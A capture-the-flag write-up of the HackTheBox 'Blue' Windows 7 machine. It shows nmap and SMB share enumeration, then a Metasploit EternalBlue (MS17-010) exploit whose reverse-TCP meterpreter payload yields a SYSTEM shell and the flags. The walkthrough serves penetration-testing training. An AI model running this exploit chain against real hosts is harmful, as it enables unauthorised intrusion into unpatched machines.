HackTheBox: Blue
smb eternal-blue metasploitBlue is a Windows-based machine authored by ch4p, with an average rating of 4.5 stars.
// Recon
nmap -A blue.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-11 08:58 AEST
Nmap scan report for blue.htb (10.10.10.40)
Host is up (0.017s latency).
Not shown: 991 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2022-01-10T23:01:21
|_ start_date: 2022-01-10T22:55:14
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: haris-PC
| NetBIOS computer name: HARIS-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-01-10T23:01:22+00:00
|_clock-skew: mean: 1m26s, deviation: 2s, median: 1m24s
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.81 seconds
Nmap reveals the machine is named haris-PC, is part of a workgroup WORKGROUP and runs Windows 7 Professional, indicating it is likely some kind of office workstation rather than a pure server. The open state of ports 139 && 445 also indicate the machine is running SMB (Server Message Block) that allows for sharing of files, printers etc. We can also see that a guest account is available, and that message signing is “enabled, but not required”. Running crackmapexec confirms a lot of this information, as well as revealing that SMBv1 is enabled:
crackmapexec smb 10.10.10.40
SMB 10.10.10.40 445 HARIS-PC [*] Windows 7 Professional 7601 Service Pack 1 x64 (name:HARIS-PC) (domain:haris-PC) (signing:False) (SMBv1:True)
Since there is a guest account available, we can also enumerate the shares using the NSE smb-enum-shares script:
nmap -sV --script=smb-enum-shares -p445 10.10.10.40
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-10 18:47 EST
Nmap scan report for 10.10.10.40
Host is up (0.022s latency).
PORT STATE SERVICE VERSION
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.40\ADMIN$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Remote Admin
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.40\C$:
| Type: STYPE_DISKTREE_HIDDEN
| Comment: Default share
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.40\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: Remote IPC
| Anonymous access: READ
| Current user access: READ/WRITE
| \\10.10.10.40\Share:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
| Current user access: READ
| \\10.10.10.40\Users:
| Type: STYPE_DISKTREE
| Comment:
| Anonymous access: <none>
|_ Current user access: READ
We now have two shares that the guest user has READ access to - Share and Users. We can mount these onto local directories to browse them further:
mkdir Users && sudo mount -t cifs -o user=guest //10.10.10.40/Users ./Users
mkdir Share && sudo mount -t cifs -o user=guest //10.10.10.40/Share ./Share
While this works, there isn’t anything interesting in the two shares. Share is completely empty, and Users mostly contains a series of default Windows folder and documents.
// Initial Foothold
While SMB security has improved over the course of its lifetime, it remains a notable weakness. This is in part due to a number of insecure-by-default settings that often aren’t changed, as well as the fact that backwards compatibility is generally maintained to ensure that machines running newer versions can still work with those running older versions.
EternalBlue is a well known exploit of SMB, and has served as the enabler of multiple ransomware attacks, backdoors and trojans. The essence of the vulnerability lies in how SMBv1 fails to properly handle specially crafted packets, allowing the execution of remote code. As we discovered during the recon phase, SMBv1 is supported on this machine, despite SMBv2 being its default protocol. EternalBlue has been well documented, and multiple modules of metasploit are available to first confirm it’s existence:
msf6 > use scanner/smb/smb_ms17_010
msf6 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 auxiliary(scanner/smb/smb_ms17_010) > run
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution complet
And then easily exploit it:
msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
RHOSTS => 10.10.10.40
msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.10.14.23:4444
[*] 10.10.10.40:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.10.40:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.10.40:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.10.40:445 - The target is vulnerable.
[*] 10.10.10.40:445 - Connecting to target for exploitation.
[+] 10.10.10.40:445 - Connection established for exploitation.
[+] 10.10.10.40:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.10.40:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.10.40:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.10.40:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.10.40:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.10.40:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.10.40:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.10.40:445 - Sending all but last fragment of exploit packet
[*] 10.10.10.40:445 - Starting non-paged pool grooming
[+] 10.10.10.40:445 - Sending SMBv2 buffers
[+] 10.10.10.40:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.10.40:445 - Sending final SMBv2 buffers.
[*] 10.10.10.40:445 - Sending last fragment of exploit packet!
[*] 10.10.10.40:445 - Receiving response from exploit packet
[+] 10.10.10.40:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.10.40:445 - Sending egg to corrupted connection.
[*] 10.10.10.40:445 - Triggering free of corrupted buffer.
[*] Sending stage (200262 bytes) to 10.10.10.40
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.10.40:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] Meterpreter session 8 opened (10.10.14.23:4444 -> 10.10.10.40:49164 ) at 2022-01-12 09:35:42 +1000
meterpreter >
We can then drop into a system command shell, and run whoami to reveal that we have administrator access:
meterpreter > shell
Process 1660 created.
Channel 2 created.
Microsoft Windows [Version 6.1.7601]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>
// User-Flag & Root-Flag
A brief browse around the filesystem reveals the user flag in a typical location:
C:\Users>dir C:\Users\haris\Desktop
dir C:\Users\haris\Desktop
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users\haris\Desktop
24/12/2017 02:23 <DIR> .
24/12/2017 02:23 <DIR> ..
21/07/2017 06:54 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 17,248,882,688 bytes free
C:\Users>type C:\Users\haris\Desktop\user.txt
type C:\Users\haris\Desktop\user.txt
4c5*****************************
and since we’re already running as the administrator, we can also access the root flag without needing any sort of privilege escalation:
C:\Users>dir C:\Users\Administrator\Desktop
dir C:\Users\Administrator\Desktop
Volume in drive C has no label.
Volume Serial Number is A0EF-1911
Directory of C:\Users\Administrator\Desktop
24/12/2017 02:22 <DIR> .
24/12/2017 02:22 <DIR> ..
21/07/2017 06:57 32 root.txt
1 File(s) 32 bytes
2 Dir(s) 17,248,227,328 bytes free
C:\Users>type C:\Users\Administrator\Desktop\root.txt
type C:\Users\Administrator\Desktop\root.txt
ff5*****************************
